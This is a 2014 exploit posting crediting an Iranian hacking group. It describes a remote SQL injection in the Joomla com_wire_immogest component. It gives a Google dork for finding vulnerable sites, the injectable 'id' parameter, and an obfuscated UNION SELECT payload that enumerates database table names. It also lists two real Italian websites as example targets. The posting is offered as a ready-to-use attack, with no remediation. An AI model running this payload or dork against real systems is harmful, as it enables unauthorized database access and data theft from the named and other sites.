Joomla Wire Immogest component suffers from a remote SQL injection vulnerability.
00f576b8ef70f91d67d4a0cdd53e86330293ac059312acb206cf9b1dee235766
**************************************************
IIIIIIII RRRRRRRRRRRR HHHHHHHH HHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRRRRRRRR HHHHHHHHHHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIIIIIII RRRRRRRR RRRRRR HHHHHHHH HHHHHHHH
***************************************************
# Exploit Title: Joomla com_wire_immogest SQL Injection vulnerabilities
# Google Dork: inurl:index.php?option=com_wire_immoges or allinurl:index.php?option=com_wire_immoges
# Date: 2014
# Exploit Author: MR.XpR
# Tested on: 7 , Kali
# CVE : OSVDB-ID: 87868
# Screen Shot : http://cld.persiangig.com/cfs/rest/documents/39410/preview?size=large
***************************************************
Exploit :
index.php?option=com_wire_immogest&view=object&id=[sqli]
Injetion Demo :
http://www.victim.com/index.php?option=com_wire_immogest&view=object&id=999++/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+
Example Site :
http://www.immobiliareoikia.it/index.php?option=com_wire_immogest&view=object&id=3%27
http://www.subitoecasa.it/index.php?option=com_wire_immogest&view=object&id=1163%27
***************************************************
TnX To :
MojiRider,V30sharp,Black.viper,Zer0killer,SecretWalker,FarBodEzrail,Amirio,AL1R3Z4,3is@,Mr.a!i,Mr.3ler0n,Irblackhat,inj3ct0r,3inst3in,Remot3r,IRH Member
./IRaNHaCK.org